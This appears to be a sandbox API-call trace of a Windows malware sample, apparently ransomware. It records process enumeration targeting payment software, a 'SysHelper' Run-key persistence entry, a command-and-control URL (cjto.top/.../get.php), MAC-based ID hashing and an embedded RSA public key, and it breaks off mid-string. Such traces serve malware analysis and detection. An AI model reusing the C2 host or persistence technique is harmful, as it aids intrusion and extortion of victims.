[0162.674] EnumProcessModules (in: hProcess=0x5b4, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0162.675] GetModuleBaseNameW (in: hProcess=0x5b4, hModule=0x90000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="active-charge.exe") returned 0x11 [0162.675] CloseHandle (hObject=0x5b4) returned 1 [0162.675] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8bc) returned 0x5b4 [0162.675] EnumProcessModules (in: hProcess=0x5b4, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0162.676] GetModuleBaseNameW (in: hProcess=0x5b4, hModule=0x11c0000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="accupos.exe") returned 0xb [0162.676] CloseHandle (hObject=0x5b4) returned 1 [0162.676] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8cc) returned 0x5b4 [0162.677] EnumProcessModules (in: hProcess=0x5b4, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0162.677] GetModuleBaseNameW (in: hProcess=0x5b4, hModule=0x1270000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="afr38.exe") returned 0x9 [0162.678] CloseHandle (hObject=0x5b4) returned 1 [0162.678] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8e0) returned 0x5b4 [0162.678] EnumProcessModules (in: hProcess=0x5b4, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0162.679] GetModuleBaseNameW (in: hProcess=0x5b4, hModule=0x8f0000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="aldelo.exe") returned 0xa [0162.679] CloseHandle (hObject=0x5b4) returned 1 [0162.679] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8f4) returned 0x5b4 [0162.679] EnumProcessModules (in: hProcess=0x5b4, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0162.680] GetModuleBaseNameW (in: hProcess=0x5b4, hModule=0x1190000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="ccv_server.exe") returned 0xe [0162.680] CloseHandle (hObject=0x5b4) returned 1 [0162.681] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x904) returned 0x5b4 [0162.681] EnumProcessModules (in: hProcess=0x5b4, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0162.682] GetModuleBaseNameW (in: hProcess=0x5b4, hModule=0xbd0000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="centralcreditcard.exe") returned 0x15 [0162.682] CloseHandle (hObject=0x5b4) returned 1 [0162.682] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x914) returned 0x5b4 [0162.682] EnumProcessModules (in: hProcess=0x5b4, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0162.683] GetModuleBaseNameW (in: hProcess=0x5b4, hModule=0x12e0000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="creditservice.exe") returned 0x11 [0162.683] CloseHandle (hObject=0x5b4) returned 1 [0162.683] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x924) returned 0x5b4 [0162.683] EnumProcessModules (in: hProcess=0x5b4, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0162.684] GetModuleBaseNameW (in: hProcess=0x5b4, hModule=0x11f0000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="edcsvr.exe") returned 0xa [0162.684] CloseHandle (hObject=0x5b4) returned 1 [0162.685] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x934) returned 0x5b4 [0162.685] EnumProcessModules (in: hProcess=0x5b4, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0162.686] GetModuleBaseNameW (in: hProcess=0x5b4, hModule=0xe80000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="fpos.exe") returned 0x8 [0162.686] CloseHandle (hObject=0x5b4) returned 1 [0162.686] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x944) returned 0x5b4 [0162.686] EnumProcessModules (in: hProcess=0x5b4, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0162.687] GetModuleBaseNameW (in: hProcess=0x5b4, hModule=0xb70000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="isspos.exe") returned 0xa [0162.687] CloseHandle (hObject=0x5b4) returned 1 [0162.687] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x954) returned 0x5b4 [0162.687] EnumProcessModules (in: hProcess=0x5b4, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0162.688] GetModuleBaseNameW (in: hProcess=0x5b4, hModule=0xcc0000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="mxslipstream.exe") returned 0x10 [0162.688] CloseHandle (hObject=0x5b4) returned 1 [0162.688] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x964) returned 0x5b4 [0162.689] EnumProcessModules (in: hProcess=0x5b4, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0162.690] GetModuleBaseNameW (in: hProcess=0x5b4, hModule=0xc10000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="omnipos.exe") returned 0xb [0162.690] CloseHandle (hObject=0x5b4) returned 1 [0162.690] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x974) returned 0x5b4 [0162.690] EnumProcessModules (in: hProcess=0x5b4, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0162.691] GetModuleBaseNameW (in: hProcess=0x5b4, hModule=0xa20000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="spcwin.exe") returned 0xa [0162.691] CloseHandle (hObject=0x5b4) returned 1 [0162.691] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x984) returned 0x5b4 [0162.692] EnumProcessModules (in: hProcess=0x5b4, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0162.693] GetModuleBaseNameW (in: hProcess=0x5b4, hModule=0x1000000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="spgagentservice.exe") returned 0x13 [0162.693] CloseHandle (hObject=0x5b4) returned 1 [0162.693] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x994) returned 0x5b4 [0162.693] EnumProcessModules (in: hProcess=0x5b4, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0162.694] GetModuleBaseNameW (in: hProcess=0x5b4, hModule=0x12e0000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="utg2.exe") returned 0x8 [0162.695] CloseHandle (hObject=0x5b4) returned 1 [0162.695] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9a4) returned 0x5b4 [0162.695] EnumProcessModules (in: hProcess=0x5b4, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0162.700] GetModuleBaseNameW (in: hProcess=0x5b4, hModule=0x1b0000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="consolidationbeside.exe") returned 0x17 [0162.700] CloseHandle (hObject=0x5b4) returned 1 [0162.700] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9b4) returned 0x5b4 [0162.700] EnumProcessModules (in: hProcess=0x5b4, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0162.701] GetModuleBaseNameW (in: hProcess=0x5b4, hModule=0xd70000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="mrs-manitoba.exe") returned 0x10 [0162.702] CloseHandle (hObject=0x5b4) returned 1 [0162.702] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9c4) returned 0x5b4 [0162.702] EnumProcessModules (in: hProcess=0x5b4, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0162.703] GetModuleBaseNameW (in: hProcess=0x5b4, hModule=0x12b0000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="internationally-seasonal.exe") returned 0x1c [0162.703] CloseHandle (hObject=0x5b4) returned 1 [0162.703] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9f4) returned 0x0 [0162.703] CloseHandle (hObject=0x0) returned 0 [0162.704] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xa2c) returned 0x0 [0162.704] CloseHandle (hObject=0x0) returned 0 [0162.704] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x940) returned 0x0 [0162.704] CloseHandle (hObject=0x0) returned 0 [0162.704] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xa7c) returned 0x0 [0162.704] CloseHandle (hObject=0x0) returned 0 [0162.704] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x7ac) returned 0x0 [0162.704] CloseHandle (hObject=0x0) returned 0 [0162.704] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x738) returned 0x0 [0162.704] CloseHandle (hObject=0x0) returned 0 [0162.704] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x6c8) returned 0x0 [0162.704] CloseHandle (hObject=0x0) returned 0 [0162.704] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xa64) returned 0x5b4 [0162.704] EnumProcessModules (in: hProcess=0x5b4, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 0 [0162.704] CloseHandle (hObject=0x5b4) returned 1 [0162.704] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x900) returned 0x5b4 [0162.704] EnumProcessModules (in: hProcess=0x5b4, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0162.706] GetModuleBaseNameW (in: hProcess=0x5b4, hModule=0x400000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="OnB5h0yX46mreVq4.exe") returned 0x14 [0162.706] CloseHandle (hObject=0x5b4) returned 1 [0162.706] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x28) returned 0xcf9e60 [0162.706] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x25c) returned 0xd21120 [0162.706] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x25c) returned 0x3604318 [0162.706] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x25c) returned 0x3b2f808 [0162.706] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x25c) returned 0x35fcbf8 [0162.706] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x25c) returned 0x35fce60 [0162.706] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x25c) returned 0xd21a00 [0162.706] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x25c) returned 0xd21c68 [0162.706] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x25c) returned 0x369be48 [0162.706] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x25c) returned 0x369c0b0 [0162.706] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x25c) returned 0x369c318 [0162.707] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Run", ulOptions=0x0, samDesired=0xf003f, phkResult=0x18de00 | out: phkResult=0x18de00*=0x5b4) returned 0x0 [0162.707] RegQueryValueExW (in: hKey=0x5b4, lpValueName="SysHelper", lpReserved=0x0, lpType=0x18ddfc, lpData=0x18c528, lpcbData=0x18dde0*=0x400 | out: lpType=0x18ddfc*=0x2, lpData="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\ea2f22f9-d502-4d6e-b556-7aab02299e6c\\OnB5h0yX46mreVq4.exe\" --AutoStart", lpcbData=0x18dde0*=0xe8) returned 0x0 [0162.707] RegCloseKey (hKey=0x5b4) returned 0x0 [0162.707] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xf0) returned 0x35bc4f8 [0162.707] lstrlenA (lpString="\" --AutoStart") returned 13 [0162.707] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xd0) returned 0x35c3b60 [0162.707] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35bc4f8 | out: hHeap=0xcd0000) returned 1 [0162.707] PathFileExistsW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\ea2f22f9-d502-4d6e-b556-7aab02299e6c\\OnB5h0yX46mreVq4.exe") returned 1 [0162.707] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xd0) returned 0x35c3c38 [0162.707] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35c3b60 | out: hHeap=0xcd0000) returned 1 [0162.707] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x28) returned 0x35f9c70 [0162.707] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x25c) returned 0x369c580 [0162.707] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x25c) returned 0x369c7e8 [0162.707] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x25c) returned 0x369ca50 [0162.707] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x25c) returned 0x369ccb8 [0162.708] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x25c) returned 0x369cf20 [0162.708] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x25c) returned 0x369d188 [0162.708] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x25c) returned 0x3ab6460 [0162.708] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x25c) returned 0x3ab66c8 [0162.708] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x25c) returned 0x3ab6930 [0162.708] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x25c) returned 0x3ab6b98 [0162.708] lstrlenA (lpString="http://cjto.top/nddddhsspen6/get.php") returned 36 [0162.708] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4a) returned 0x362c450 [0162.708] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x369c580, cbMultiByte=-1, lpWideCharStr=0x362c450, cchWideChar=37 | out: lpWideCharStr="http://cjto.top/nddddhsspen6/get.php") returned 37 [0162.708] lstrcatW (in: lpString1="", lpString2="http://cjto.top/nddddhsspen6/get.php" | out: lpString1="http://cjto.top/nddddhsspen6/get.php") returned="http://cjto.top/nddddhsspen6/get.php" [0162.708] lstrlenA (lpString="") returned 0 [0162.708] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x2) returned 0x35fd180 [0162.708] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x369c7e8, cbMultiByte=-1, lpWideCharStr=0x35fd180, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0162.708] lstrcatW (in: lpString1="http://cjto.top/nddddhsspen6/get.php", lpString2="" | out: lpString1="http://cjto.top/nddddhsspen6/get.php") returned="http://cjto.top/nddddhsspen6/get.php" [0162.708] lstrlenA (lpString="") returned 0 [0162.708] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x2) returned 0x35fd190 [0162.708] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x369ca50, cbMultiByte=-1, lpWideCharStr=0x35fd190, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0162.708] lstrcatW (in: lpString1="http://cjto.top/nddddhsspen6/get.php", lpString2="" | out: lpString1="http://cjto.top/nddddhsspen6/get.php") returned="http://cjto.top/nddddhsspen6/get.php" [0162.708] lstrlenA (lpString="") returned 0 [0162.708] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x2) returned 0x35fd1a0 [0162.708] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x369ccb8, cbMultiByte=-1, lpWideCharStr=0x35fd1a0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0162.708] lstrcatW (in: lpString1="http://cjto.top/nddddhsspen6/get.php", lpString2="" | out: lpString1="http://cjto.top/nddddhsspen6/get.php") returned="http://cjto.top/nddddhsspen6/get.php" [0162.708] lstrlenA (lpString="") returned 0 [0162.708] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x2) returned 0x35fd1b0 [0162.708] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x369cf20, cbMultiByte=-1, lpWideCharStr=0x35fd1b0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0162.708] lstrcatW (in: lpString1="http://cjto.top/nddddhsspen6/get.php", lpString2="" | out: lpString1="http://cjto.top/nddddhsspen6/get.php") returned="http://cjto.top/nddddhsspen6/get.php" [0162.708] lstrlenA (lpString="") returned 0 [0162.708] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x2) returned 0x35fd1c0 [0162.708] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x369d188, cbMultiByte=-1, lpWideCharStr=0x35fd1c0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0162.709] lstrcatW (in: lpString1="http://cjto.top/nddddhsspen6/get.php", lpString2="" | out: lpString1="http://cjto.top/nddddhsspen6/get.php") returned="http://cjto.top/nddddhsspen6/get.php" [0162.709] lstrlenA (lpString="") returned 0 [0162.709] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x2) returned 0x35fd1e0 [0162.709] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ab6460, cbMultiByte=-1, lpWideCharStr=0x35fd1e0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0162.709] lstrcatW (in: lpString1="http://cjto.top/nddddhsspen6/get.php", lpString2="" | out: lpString1="http://cjto.top/nddddhsspen6/get.php") returned="http://cjto.top/nddddhsspen6/get.php" [0162.709] lstrlenA (lpString="") returned 0 [0162.709] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x2) returned 0x35fd1f0 [0162.709] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ab66c8, cbMultiByte=-1, lpWideCharStr=0x35fd1f0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0162.709] lstrcatW (in: lpString1="http://cjto.top/nddddhsspen6/get.php", lpString2="" | out: lpString1="http://cjto.top/nddddhsspen6/get.php") returned="http://cjto.top/nddddhsspen6/get.php" [0162.709] lstrlenA (lpString="") returned 0 [0162.709] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x2) returned 0x35fd1d0 [0162.709] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ab6930, cbMultiByte=-1, lpWideCharStr=0x35fd1d0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0162.709] lstrcatW (in: lpString1="http://cjto.top/nddddhsspen6/get.php", lpString2="" | out: lpString1="http://cjto.top/nddddhsspen6/get.php") returned="http://cjto.top/nddddhsspen6/get.php" [0162.709] lstrlenA (lpString="") returned 0 [0162.709] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x2) returned 0x35fd200 [0162.709] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ab6b98, cbMultiByte=-1, lpWideCharStr=0x35fd200, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0162.709] lstrcatW (in: lpString1="http://cjto.top/nddddhsspen6/get.php", lpString2="" | out: lpString1="http://cjto.top/nddddhsspen6/get.php") returned="http://cjto.top/nddddhsspen6/get.php" [0162.709] lstrlenW (lpString="") returned 0 [0162.709] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x12) returned 0xcf6328 [0162.709] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x288) returned 0x369d3f0 [0162.709] GetAdaptersInfo (in: AdapterInfo=0x369d3f0, SizePointer=0x18ddc4 | out: AdapterInfo=0x369d3f0, SizePointer=0x18ddc4) returned 0x0 [0163.585] GetAdaptersInfo (in: AdapterInfo=0x369d3f0, SizePointer=0x18ddc4 | out: AdapterInfo=0x369d3f0, SizePointer=0x18ddc4) returned 0x0 [0163.588] GetLastError () returned 0x0 [0163.588] GetLastError () returned 0x0 [0163.588] CryptAcquireContextW (in: phProv=0x18dd94, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x18dd94*=0xd2e8c0) returned 1 [0163.589] CryptCreateHash (in: hProv=0xd2e8c0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x18dd9c | out: phHash=0x18dd9c) returned 1 [0163.589] CryptHashData (hHash=0xd0e060, pbData=0xcfbfe0, dwDataLen=0x11, dwFlags=0x0) returned 1 [0163.589] CryptGetHashParam (in: hHash=0xd0e060, dwParam=0x2, pbData=0x0, pdwDataLen=0x18dd98, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x18dd98) returned 1 [0163.589] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x11) returned 0xcf6348 [0163.589] CryptGetHashParam (in: hHash=0xd0e060, dwParam=0x2, pbData=0xcf6348, pdwDataLen=0x18dd98, dwFlags=0x0 | out: pbData=0xcf6348, pdwDataLen=0x18dd98) returned 1 [0163.589] GetLastError () returned 0x0 [0163.589] CryptDestroyHash (hHash=0xd0e060) returned 1 [0163.589] CryptReleaseContext (hProv=0xd2e8c0, dwFlags=0x0) returned 1 [0163.589] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xcfbfe0 | out: hHeap=0xcd0000) returned 1 [0163.589] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x36087d0 [0163.589] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd36ab8 | out: hHeap=0xcd0000) returned 1 [0163.589] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xcfc058 | out: hHeap=0xcd0000) returned 1 [0163.589] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x61a8000, lpStartAddress=0x41e690, lpParameter=0x513270, dwCreationFlags=0x0, lpThreadId=0x51325c | out: lpThreadId=0x51325c*=0x9e0) returned 0x5b4 [0163.826] WaitForSingleObject (hHandle=0x5b4, dwMilliseconds=0xffffffff) returned 0x0 [0164.074] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}") returned 0x364 [0164.074] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x28) returned 0x35f9cd0 [0164.074] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x25c) returned 0x3ab6e00 [0164.074] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x25c) returned 0x3ab7068 [0164.074] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x25c) returned 0x3ab72d0 [0164.074] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x25c) returned 0x3ab7538 [0164.074] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x25c) returned 0x3ab77a0 [0164.074] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x25c) returned 0x3ab7a08 [0164.074] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x25c) returned 0x3ab7c70 [0164.074] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x25c) returned 0x3ab7ed8 [0164.074] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x25c) returned 0x3ab8140 [0164.074] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x25c) returned 0x3ab83a8 [0164.074] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x3e0) returned 0x369eea0 [0164.074] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x5ee) returned 0x369f288 [0164.074] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n", cchWideChar=-1, lpMultiByteStr=0x369f288, cbMultiByte=1518, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n", lpUsedDefaultChar=0x0) returned 495 [0164.074] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x5f0) returned 0x369f880 [0164.074] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x369f288 | out: hHeap=0xcd0000) returned 1 [0164.074] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x369eea0 | out: hHeap=0xcd0000) returned 1 [0164.074] CryptAcquireContextW (in: phProv=0x18de04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x18de04*=0xd2e8c0) returned 1 [0164.075] CryptCreateHash (in: hProv=0xd2e8c0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x18de08 | out: phHash=0x18de08) returned 1 [0164.075] lstrlenA (lpString="-----BEGIN PUBLIC 